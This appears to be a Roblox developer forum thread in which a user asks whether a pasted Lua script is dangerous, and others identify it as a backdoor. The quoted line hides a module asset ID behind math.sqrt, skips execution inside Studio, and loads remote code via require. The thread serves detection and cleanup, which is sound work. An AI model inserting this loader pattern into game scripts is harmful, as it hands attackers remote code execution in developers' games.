Any idea on what this script means, and if it is dangerous or not?
1 | spawn( function ()game:WaitForChild( 'ServerScriptService' ) if game:GetService( 'Workspace' ).Terrain:FindFirstChild( 'CallF' ) then return end ; if game:GetService( 'RunService' ):IsStudio() then return end ;require(math.sqrt( 6.7743462758588 e+ 18 )). load (game.PlaceId) end ) |
Yeah, that's a backdoor. It lets exploiters execute bad code into your games. I've had it before and it was in a plugin, so do Ctrl+Shift+F and paste the code in so that you can delete it from all the scripts that have it.
that is a backdoor 150% the "require" requires a module script (if im not incorrect)
(math.sqrt(6.7743462758588e+18)) i ran it and it came back with this: 2602757437
the reason i think it errored is that asset is " [ Content Deleted ] " you can view the original thing
Also the owner of it has been banned so it should stop all backdoors he added
I recommend THIS plugin to attempt to find backdoors / finds any scripts that have the word "require" and either A prints the script or B deletes the script Heres some pictures